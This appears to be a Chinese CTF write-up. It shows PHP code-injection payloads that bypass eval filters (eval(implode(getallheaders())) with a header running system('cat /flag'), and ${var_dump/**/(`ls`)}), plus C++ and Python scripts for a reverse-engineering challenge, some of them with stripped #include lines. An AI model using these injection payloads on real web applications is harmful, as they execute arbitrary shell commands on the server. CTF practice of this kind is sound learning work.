makerctf

抛开一切，讲讲两道巧妙的web题目

(?R)递归正则的绕过

• 可以在https://ctftime.org/writeup/10150找到思路
• implode函数：implode把数组整合成一个字符串，此处把请求头数组整合成一个字符串
• getallheaders()获取请求头，由此构造执行参数。
  我们在第一个请求头后面添加注释，这样执行的时候就可以绕过了。这里注意的是，代码中只是检查了请求参数，并没有检查请求头，这样给我们造成了利用的空间。

GET /w1nd_web1.php?magic=eval(implode(getallheaders()));/*hello%20w1nd*/ HTTP/1.1
eval: system('cat /flag');//

easy_eval

打开看到有addslashes函数，查找函数说明可知，会对单双引号加上反斜杠转义。

• 我们这里用过```符号执行内部命令。（Linux中的用法）
• 如果直接函数加(会被正则检查到，可以用注释/**/的方式绕过。
• Eval中直接给变量赋值没办法执行命令，我们可以通过${}先运算大括号里面的内容
  首先构造

cmd=${var_dump/**/(`ls`)} 

查看目录文件

cmd=${var_dump/**/(`cat flag.php`)}

查看flag

其他

// ConsoleApplication1.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//

#include "pch.h"
#include 
#include
#include
#include
#include
#include
#include 
#include 
#include
using namespace std;
char Dst[100] = { 0 };
char Dst_Str[] = "vDi/gDh3]s:pEtjq:6EB9qjq9[be9-8~)*i(";
void work(char*source_Str) {
    //char source_Str[] = "";
    char middle_str[] = "@,.1fjsz^+{5bkrA&=}6a8D9E:gv)]ux$~\"3dity%_;w#`/2ehlqB*-[70mpC(4c";
    int source_index = 0;
    int dst_index = 0;
    int len_str = strlen(source_Str);
    if (len_str!=3)
    {
        cout << "LEN_SOUTCE_ERROR!\n";
        system("pause");
    }
    int dst_index_add_3_out, dst_index_add_1, dst_index_add_2, dst_index_add_3;
    unsigned int v7, v3, v8;
    //while (source_index < len_str)
    {
        *(byte  *)(Dst + dst_index) = middle_str[(*(byte *)(source_index + source_Str) >> 2) & 0x3F];
        dst_index_add_1 = dst_index + 1;
        v7 = 16 * (*(byte  *)(source_index + source_Str)) & 0x30;
        if (source_index + 1 >= len_str)
        {
            *(byte  *)(Dst + dst_index_add_1) = middle_str[v7];
            v3 = dst_index_add_1 + 1;
            *(byte  *)(Dst + v3++) = 77;
            *(byte  *)(Dst + v3) = 77;
            dst_index = v3 + 1;
            goto Out_label; //break;
        }
        *(byte  *)(Dst + dst_index_add_1) = middle_str[(*(byte  *)(source_Str + source_index + 1) >> 4) & 0xF | v7];
        dst_index_add_2 = dst_index_add_1 + 1;
        v8 = 4 * *(byte  *)(source_Str + source_index + 1) & 0x3C;
        if (source_index + 2 >= len_str)
        {
            *(byte  *)(Dst + dst_index_add_2) = middle_str[v8];
            dst_index_add_3 = dst_index_add_2 + 1;
            *(byte  *)(Dst + dst_index_add_3) = 77;
            dst_index = dst_index_add_3 + 1;
            goto Out_label;//break;
        }
        *(byte  *)(Dst + dst_index_add_2) = middle_str[(*(byte  *)(source_Str + source_index + 2) >> 6) & 3 | v8];
        dst_index_add_3_out = dst_index_add_2 + 1;
        *(byte  *)(Dst + dst_index_add_3_out) = middle_str[*(byte  *)(source_Str + source_index + 2) & 0x3F];
        dst_index = dst_index_add_3_out + 1;
        source_index += 3;
    }
Out_label:
    *(byte  *)(dst_index + Dst) = 0;
}

int main() {
    char tmp[4]={0};
    //work(tmp);
    //printf("%s", Dst);
    cout << "begin" << endl;
    //system("pause");
    for (int t = 0; t < (strlen(Dst_Str)); t+=4) {//strlen(Dst_Str)
        cout << t << endl;
        for (int i = 1; i <= 125; i++)
            for (int j = 1; j <= 125; j++)
                for (int z = 1; z <= 125; z++){
                        memset(Dst, 0, sizeof(Dst));
                        memset(tmp, 0, sizeof(tmp));
                        tmp[0] = i;
                        tmp[1] = j;
                        tmp[2] = z;
                        tmp[3] = 0;
                        work(tmp);
                        if (!strncmp(Dst, Dst_Str+t, 4))
                        {
                            //cout << "Input: " << tmp << " Output: " << Dst << endl;
                            printf("Input: %s Output: %s\n", tmp, Dst);
                        }
                    }
    
    }
}

a=[
0x61, 0x00, 0x00, 0x00, 0x70, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x56, 0x00, 0x00, 0x00,
0x74, 0x00, 0x00, 0x00, 0x4D, 0x00, 0x00, 0x00, 0x72, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x00, 0x00,
0x7E, 0x00, 0x00, 0x00, 0x6F, 0x00, 0x00, 0x00, 0x41, 0x00, 0x00, 0x00, 0x32, 0x00, 0x00, 0x00,
0x10, 0x00, 0x00, 0x00, 0x66, 0x00, 0x00, 0x00, 0x58, 0x00, 0x00, 0x00, 0x58, 0x00, 0x00, 0x00,
0x2A, 0x00, 0x00, 0x00, 0x87, 0x00, 0x00, 0x00, 0x6F, 0x00, 0x00, 0x00, 0x6E, 0x00, 0x00, 0x00,
0x32, 0x00, 0x00, 0x00, 0x47, 0x00, 0x00, 0x00, 0x5C, 0x00, 0x00, 0x00, 0x71, 0x00, 0x00, 0x00,
0x3B, 0x00, 0x00, 0x00, 0x92, 0x00, 0x00, 0x00, 0x3B, 0x00, 0x00, 0x00, 0x63, 0x00, 0x00, 0x00,
0x37, 0x00, 0x00, 0x00, 0x57, 0x00, 0x00, 0x00, 0x2C, 0x00, 0x00, 0x00, 0x5E, 0x00, 0x00, 0x00,
0x85, 0x00, 0x00, 0x00, 0x94, 0x00, 0x00, 0x00, 0x47, 0x00, 0x00, 0x00, 0x33, 0x00, 0x00, 0x00
]
t=[]
n=[]
s1=""
middle1='''@,.1fjsz^+{5bkrA&=}6a8D9E:gv)]ux$~"3dity%_;w#`/2ehlqB*-[70mpC(4c'''
middle2=[23, 43, 54, 124, 23, 12, 4, 21, 43, 21, 13, 87, 65, 45, 32, 56, 32, 64, 24, 25, 39, 67, 44, 43, 26, 34, 67, 45, 34, 23, 54, 65, 76, 89, 76, 56]
#m="@,.1fjsz^+{5bkrA&=}6a8D9E:gv)]ux$~\"3dity%_;w#`/2ehlqB*-[70mpC(4c"
for i in a:
    if int(i)!=0:
        t.append(int(i))
#print t
for i in range(0,len(middle2)):
    t[i]-=i
    t[i]^=middle2[i]
    s1+=chr(t[i])
print s1
for i in s1:
    for j in range(0,len(middle1)):
        if middle1[j]==i:
            n.append(j)
            break
print n
print len(n)
print len(t)
#print n

https://ctftime.org/writeup/10150

GET /w1nd_web1.php?magic=eval(implode(getallheaders()));/*hello%20w1nd*/ HTTP/1.1
cmd: system('cat /flag');//
Host: 62.234.153.161
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close